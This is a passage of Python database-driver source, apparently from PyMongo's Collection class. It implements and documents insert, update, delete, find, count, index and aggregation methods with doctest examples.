# Legacy OP_INSERT.
self._legacy_write(
sock_info, 'insert', command, acknowledged, op_id,
bypass_doc_val, message.insert, self.__full_name, [doc],
check_keys, acknowledged, concern, False,
self.__write_response_codec_options)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, sock_info, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False):
"""Internal insert helper."""
if isinstance(docs, collections.Mapping):
return self._insert_one(
sock_info, docs, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('insert', self.name),
('ordered', ordered)])
if concern:
command['writeConcern'] = concern
if op_id is None:
op_id = message._randint()
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
bwc = message._BulkWriteContext(
self.database.name, command, sock_info, op_id,
self.database.client._event_listeners)
if sock_info.max_wire_version > 1 and acknowledged:
# Batched insert command.
results = message._do_batched_write_command(
self.database.name + ".$cmd", message._INSERT, command,
gen(), check_keys, self.__write_response_codec_options, bwc)
_check_write_command_response(results)
else:
# Legacy batched OP_INSERT.
message._do_batched_insert(self.__full_name, gen(), check_keys,
acknowledged, concern, not ordered,
self.__write_response_codec_options, bwc)
return ids
def insert_one(self, document, bypass_document_validation=False):
"""Insert a single document.
>>> db.test.count({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
with self._socket_for_writes() as sock_info:
return InsertOneResult(
self._insert(sock_info, document,
bypass_doc_val=bypass_document_validation),
self.write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False):
"""Insert an iterable of documents.
>>> db.test.count()
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count()
2
:Parameters:
- `documents`: A iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, collections.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(self.write_concern.document)
return InsertManyResult(inserted_ids, self.write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('update', self.name),
('ordered', ordered),
('updates', [SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])])])
if concern:
command['writeConcern'] = concern
if sock_info.max_wire_version > 1 and acknowledged:
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
codec_options=self.__write_response_codec_options).copy()
_check_write_command_response([(0, result)])
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
return result
else:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, acknowledged, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, acknowledged, concern, check_keys,
self.__write_response_codec_options)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
with self._socket_for_writes() as sock_info:
result = self._update(sock_info, filter, replacement, upsert,
bypass_doc_val=bypass_document_validation)
return UpdateResult(result, self.write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
with self._socket_for_writes() as sock_info:
result = self._update(sock_info, filter, update, upsert,
check_keys=False,
bypass_doc_val=bypass_document_validation)
return UpdateResult(result, self.write_concern.acknowledged)
def update_many(self, filter, update, upsert=False,
bypass_document_validation=False):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
with self._socket_for_writes() as sock_info:
result = self._update(sock_info, filter, update, upsert,
check_keys=False, multi=True,
bypass_doc_val=bypass_document_validation)
return UpdateResult(result, self.write_concern.acknowledged)
def drop(self):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
"""
self.__database.drop_collection(self.__name)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [SON([('q', criteria),
('limit', int(not multi))])])])
if concern:
command['writeConcern'] = concern
if sock_info.max_wire_version > 1 and acknowledged:
# Delete command.
result = sock_info.command(
self.__database.name,
command,
codec_options=self.__write_response_codec_options)
_check_write_command_response([(0, result)])
return result
else:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, acknowledged, op_id,
False, message.delete, self.__full_name, criteria,
acknowledged, concern, self.__write_response_codec_options,
int(not multi))
def delete_one(self, filter):
"""Delete a single document matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionadded:: 3.0
"""
with self._socket_for_writes() as sock_info:
return DeleteResult(self._delete(sock_info, filter, False),
self.write_concern.acknowledged)
def delete_many(self, filter):
"""Delete one or more documents matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionadded:: 3.0
"""
with self._socket_for_writes() as sock_info:
return DeleteResult(self._delete(sock_info, filter, True),
self.write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
- `max_time_ms` (optional): a value for max_time_ms may be
specified as part of `**kwargs`, e.g.
>>> find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, collections.Mapping)):
filter = {"_id": filter}
max_time_ms = kwargs.pop("max_time_ms", None)
cursor = self.find(filter,
*args, **kwargs).max_time_ms(max_time_ms)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `modifiers` (optional): A dict specifying the MongoDB `query
modifiers`_ that should be used for this query. For example::
>>> db.test.find(modifiers={"$maxTimeMS": 500})
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. _query modifiers:
http://docs.mongodb.org/manual/reference/operator/query-modifier/
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors):
"""Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
with self._socket_for_reads() as (sock_info, slave_ok):
result = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)
return [CommandCursor(self, cursor['cursor'], sock_info.address)
for cursor in result['cursors']]
def _count(self, cmd):
"""Internal count helper."""
with self._socket_for_reads() as (sock_info, slave_ok):
res = self._command(
sock_info, cmd, slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def count(self, filter=None, **kwargs):
"""Get the number of documents in this collection.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
- `limit` (int): The maximum number of documents to count.
- `skip` (int): The number of matching documents to skip before
returning results.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `**kwargs` (optional): See list of options above.
"""
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
cmd.update(kwargs)
return self._count(cmd)
def create_indexes(self, indexes):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
.. note:: `create_indexes` uses the ``createIndexes`` command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. versionadded:: 3.0
"""
if not isinstance(indexes, list):
raise TypeError("indexes must be a list")
names = []
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError("%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
return names
def __create_index(self, keys, index_options):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
index.update(index_options)
with self._socket_for_writes() as sock_info:
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
try:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
except OperationFailure as exc:
if exc.code in common.COMMAND_NOT_FOUND_CODES:
index["ns"] = self.__full_name
wcn = (self.write_concern if
self.write_concern.acknowledged else WriteConcern())
self.__database.system.indexes._insert(
sock_info, index, True, False, False, wcn)
else:
raise
def create_index(self, keys, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
self.__create_index(keys, kwargs)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self):
"""Drops all indexes on this collection.
        Can be used on non-existent collections or collections with no indexes.
Raises OperationFailure on an error.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*")
def drop_index(self, index_or_name):
"""Drops the specified index on this collection.
        Can be used on non-existent collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
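        For example, an index created from a (key, direction) specifier can be
        dropped with the same specifier (illustrative only; ``db.test`` and the
        ``mike`` field are assumed)::
          >>> db.test.create_index([("mike", pymongo.DESCENDING)])
          u'mike_-1'
          >>> db.test.drop_index([("mike", pymongo.DESCENDING)])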
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"])
def reindex(self):
"""Rebuilds all indexes on this collection.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
"""
cmd = SON([("reIndex", self.__name)])
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
def list_indexes(self):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options)
with self._socket_for_primary_reads() as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
cursor = self._command(sock_info, cmd, slave_ok,
ReadPreference.PRIMARY,
codec_options)["cursor"]
return CommandCursor(coll, cursor, sock_info.address)
else:
namespace = _UJOIN % (self.__database.name, "system.indexes")
res = helpers._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
ReadPreference.PRIMARY, cmd,
self.database.client._event_listeners)
data = res["data"]
cursor = {
"id": res["cursor_id"],
"firstBatch": data,
"ns": namespace,
}
# Note that a collection can only have 64 indexes, so we don't
# technically have to pass len(data) here. There will never be
# an OP_GET_MORE call.
return CommandCursor(
coll, cursor, sock_info.address, len(data))
def index_information(self):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
        metadata about the indexes, except for the ``"name"`` key, which is
        used as the key of the returned dictionary. Example output might look
        like this:
>>> db.test.ensure_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
"""
cursor = self.list_indexes()
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
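        For example, for a capped collection created with
        ``db.create_collection("log", capped=True, size=4096)`` the result
        might look like this (the collection and values are illustrative)::
          >>> db.log.options()
          {u'capped': True, u'size': 4096}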
"""
with self._socket_for_primary_reads() as (sock_info, slave_ok):
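            # listCollections (MongoDB 3.0+, wire version 3) matches on the
            # bare collection name; older servers are queried through
            # system.namespaces, which stores fully qualified names.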
if sock_info.max_wire_version > 2:
criteria = {"name": self.__name}
else:
criteria = {"name": self.__full_name}
cursor = self.__database._list_collections(sock_info,
slave_ok,
criteria)
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def aggregate(self, pipeline, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional aggregate parameters should be passed as keyword arguments
to this method. Valid options include, but are not limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `useCursor` (bool): Requests that the `server` provide results
using a cursor, if possible. Ignored if the connected mongod or
mongos does not support returning aggregate results using a cursor.
The default is ``True``. Set this to ``False`` when upgrading a 2.4
or older sharded cluster to 2.6 or newer (see the warning below).
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. warning:: When upgrading a 2.4 or older sharded cluster to 2.6 or
newer the `useCursor` option **must** be set to ``False``
until all shards have been upgraded to 2.6 or newer.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
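        For example, a pipeline that counts documents per ``author`` could be
        run like this (``author`` is a hypothetical field, shown for
        illustration only)::
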